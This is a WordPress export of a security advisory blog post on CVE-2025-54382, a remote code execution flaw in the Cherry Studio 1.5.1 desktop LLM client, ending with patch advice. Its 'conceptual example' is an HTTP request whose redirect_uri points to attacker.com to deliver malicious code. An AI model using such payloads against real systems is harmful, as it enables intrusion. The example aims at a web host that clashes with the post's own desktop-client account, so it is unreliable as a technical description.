{"id":64181,"date":"2025-08-20T02:01:07","date_gmt":"2025-08-20T02:01:07","guid":{"rendered":""},"modified":"2025-09-08T17:18:36","modified_gmt":"2025-09-08T23:18:36","slug":"cve-2025-54382-remote-code-execution-vulnerability-in-cherry-studio","status":"publish","type":"post","link":"https:\/\/www.ameeba.com\/blog\/cve-2025-54382-remote-code-execution-vulnerability-in-cherry-studio\/","title":{"rendered":"<strong>CVE-2025-54382: Remote Code Execution Vulnerability in Cherry Studio<\/strong>"},"content":{"rendered":"<p><strong>Overview<\/strong><\/p>\n<p>Cherry Studio, a desktop client that supports multiple LLM providers, has been identified as having a significant security flaw. This vulnerability, tracked as CVE-2025-54382, affects version 1.5.1 of Cherry Studio, and may potentially lead to system compromise or data leakage. This issue is of particular concern to organizations using Cherry Studio as a part of their workflow, as it can allow remote attackers to execute arbitrary code and gain <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-53499-critical-unauthorized-access-vulnerability-in-wikimedia-foundation-mediawiki-abusefilter-extension\/\"  data-wpil-monitor-id=\"72819\">unauthorized access<\/a> to sensitive information.<\/p>\n<p><strong>Vulnerability Summary<\/strong><\/p>\n<p>CVE ID: CVE-2025-54382<br \/>\nSeverity: Critical (9.6 CVSS Score)<br \/>\nAttack Vector: Network<br \/>\nPrivileges Required: None<br \/>\nUser Interaction: Required<br \/>\nImpact: <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-21432-memory-corruption-vulnerability-resulting-in-potential-system-compromise-or-data-leakage\/\"  data-wpil-monitor-id=\"76052\">System compromise or data<\/a> leakage<\/p>\n<p><strong>Affected Products<\/strong><\/p><div id=\"ameeb-1010260017\" class=\"ameeb-content-2 ameeb-entity-placement\"><div style=\"border-left: 4px solid #555; padding-left: 20px; margin: 48px 0; font-family: Roboto, sans-serif; color: #ffffff; line-height: 1.6; max-width: 700px;\">\r\n  <h2 style=\"margin-top: 0; font-size: 20px; font-weight: 600; display: flex; align-items: center;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"display: inline-flex; align-items: center; margin-right: 8px;\">\r\n      <img decoding=\"async\" src=\"https:\/\/www.ameeba.com\/blog\/wp-content\/uploads\/2025\/10\/Best-App-icon-Ameeba.png\" alt=\"Ameeba Chat Icon\" style=\"width: 40px; height: 40px;\" \/>\r\n    <\/a>\r\n    A new way to communicate\r\n  <\/h2>\r\n\r\n  <p style=\"margin-bottom: 12px;\">\r\n    Ameeba Chat is built on encrypted identity, not personal profiles.\r\n  <\/p>\r\n\r\n  <p style=\"margin-bottom: 16px;\">\r\n    Message, call, share files, and coordinate with identities kept separate.\r\n  <\/p>\r\n\r\n  <ul style=\"list-style: none; padding-left: 0; margin-bottom: 20px;\">\r\n    <li>\u2022 Encrypted identity<\/li>\r\n    <li>\u2022 Ameeba Chat authenticates access<\/li>\r\n    <li>\u2022 Aliases and categories<\/li>\r\n    <li>\u2022 End-to-end encrypted chat, calls, and files<\/li>\r\n    <li>\u2022 Secure notes for sensitive information<\/li>\r\n  <\/ul>\r\n\r\n  <p style=\"font-style: italic; font-weight: 600; margin-bottom: 24px;\">\r\n    Private communication, rethought.\r\n  <\/p>\r\n\r\n  <div style=\"display: flex; flex-wrap: wrap; gap: 12px;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\/download\" style=\"background-color: #ffffff; color: #000000; padding: 10px 20px; text-decoration: none; border-radius: 6px; font-weight: 500;\">Download Ameeba Chat<\/a>\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"border: 1px solid #ffffff; color: #ffffff; padding: 10px 20px; text-decoration: none; border-radius: 6px; font-weight: 500;\">Learn More<\/a>\r\n  <\/div>\r\n<\/div>\r\n<\/div>\n<p>Product | Affected Versions<\/p>\n<p><a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-54063-remote-code-execution-vulnerability-in-cherry-studio-desktop-client\/\"  data-wpil-monitor-id=\"78323\">Cherry Studio<\/a> | 1.5.1<\/p>\n<p><strong>How the Exploit Works<\/strong><\/p>\n<p>This <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-8028-critical-vulnerability-in-firefox-and-thunderbird-due-to-incorrect-computation-of-branch-address\/\"  data-wpil-monitor-id=\"73824\">vulnerability arises due<\/a> to Cherry Studio&#8217;s implicit trust in the oauth auth redirection endpoints when connecting to streamableHttp MCP servers. The critical flaw lies in the failure to properly sanitize the URL, which opens the door for malicious actors to <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-36014-ibm-integration-bus-code-injection-vulnerability\/\"  data-wpil-monitor-id=\"72270\">inject arbitrary code<\/a>. The attacker can exploit this <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-44955-critical-vulnerability-in-ruckus-network-director-allows-jail-users-to-gain-root-access\/\"  data-wpil-monitor-id=\"76051\">vulnerability by sending a specially crafted URL to the user<\/a>. Once clicked, this URL can trigger the <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-50754-stored-cross-site-scripting-xss-vulnerability-leading-to-remote-code-execution-in-unisite-cms-5-0\/\"  data-wpil-monitor-id=\"74594\">execution of malicious code<\/a> on the victim&#8217;s system.<\/p>\n<p><strong>Conceptual Example Code<\/strong><\/p><div id=\"ameeb-4119209955\" class=\"ameeb-content ameeb-entity-placement\"><div class=\"poptin-embedded\" data-id=\"f6b387694f681\"><\/div>\r\n\r\n\r\n\r\n\r\n\r\n<\/div>\n<p>A conceptual example of how this vulnerability might be exploited is shown below. This is a hypothetical HTTP <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2024-9408-server-side-request-forgery-attack-in-eclipse-glassfish\/\"  data-wpil-monitor-id=\"77387\">request that an attacker<\/a> could send to exploit the vulnerability:<\/p>\n<pre><code class=\"\" data-line=\"\">GET \/oauth\/redirect?client_id=...&amp;redirect_uri=http%3A%2F%2Fattacker.com%2Fmalicious_code HTTP\/1.1\nHost: vulnerable-cherry-studio.com<\/code><\/pre>\n<p>In this example, the attacker manipulates the `redirect_uri` parameter to point to their own server (`attacker.com`) where the <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-8714-critical-postgresql-vulnerability-allowing-malicious-code-injection-by-superusers\/\"  data-wpil-monitor-id=\"80654\">malicious code<\/a> resides. When this request is processed by Cherry Studio, it could trigger the <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-27577-arbitrary-code-execution-in-openharmony-via-race-condition-vulnerability\/\"  data-wpil-monitor-id=\"76221\">execution of the included malicious code<\/a>.<\/p>\n<p><strong>Recommendations<\/strong><\/p>\n<p>It is recommended that users of Cherry Studio immediately update to the patched version 1.5.2. In cases where immediate patching is not possible, implementing a Web Application Firewall (WAF) or Intrusion Detection System (IDS) can serve as a temporary mitigation. These systems can <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-30327-integer-overflow-vulnerability-in-incopy-leading-to-potential-arbitrary-code-execution\/\"  data-wpil-monitor-id=\"73610\">potentially detect and block attempts to exploit this vulnerability<\/a>. However, these are not long-term solutions and the patch should be applied as soon as feasible. It is also recommended to follow best practices for secure <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-47168-use-after-free-vulnerability-in-microsoft-office-word-allowing-unauthorized-code-execution\/\"  data-wpil-monitor-id=\"73102\">coding to prevent such vulnerabilities<\/a> from occurring in the first place.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Overview Cherry Studio, a desktop client that supports multiple LLM providers, has been identified as having a significant security flaw. This vulnerability, tracked as CVE-2025-54382, affects version 1.5.1 of Cherry Studio, and may potentially lead to system compromise or data leakage. This issue is of particular concern to organizations using Cherry Studio as a part [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"footnotes":""},"categories":[1],"tags":[],"vendor":[],"product":[],"attack_vector":[80],"asset_type":[],"severity":[],"exploit_status":[],"class_list":["post-64181","post","type-post","status-publish","format-standard","hentry","category-uncategorized","attack_vector-rce"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/64181","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/comments?post=64181"}],"version-history":[{"count":11,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/64181\/revisions"}],"predecessor-version":[{"id":73083,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/64181\/revisions\/73083"}],"wp:attachment":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/media?parent=64181"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/categories?post=64181"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/tags?post=64181"},{"taxonomy":"vendor","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/vendor?post=64181"},{"taxonomy":"product","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/product?post=64181"},{"taxonomy":"attack_vector","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/attack_vector?post=64181"},{"taxonomy":"asset_type","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/asset_type?post=64181"},{"taxonomy":"severity","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/severity?post=64181"},{"taxonomy":"exploit_status","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/exploit_status?post=64181"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}